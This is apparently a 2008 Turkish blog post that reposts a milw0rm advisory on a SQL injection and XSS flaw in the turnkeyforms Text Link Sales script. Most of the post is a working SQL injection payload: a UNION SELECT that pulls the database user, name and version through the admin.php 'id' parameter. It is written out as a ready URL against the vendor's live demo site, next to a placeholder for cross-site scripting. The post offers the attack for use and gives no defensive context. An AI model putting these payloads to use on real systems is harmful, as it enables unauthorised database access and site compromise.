"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

15 Kasım 2008 Cumartesi

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7124

Discovered By: ZoRLu

Exploit: sql inj

http://localhost/script/admin.php?a=users&id=[SQL]


[SQL]

999+union+select+1,user(),database(),version(),5,6,7--


sql for demo:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--


xss:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=[XSS]

0 yorum:

 
Dizi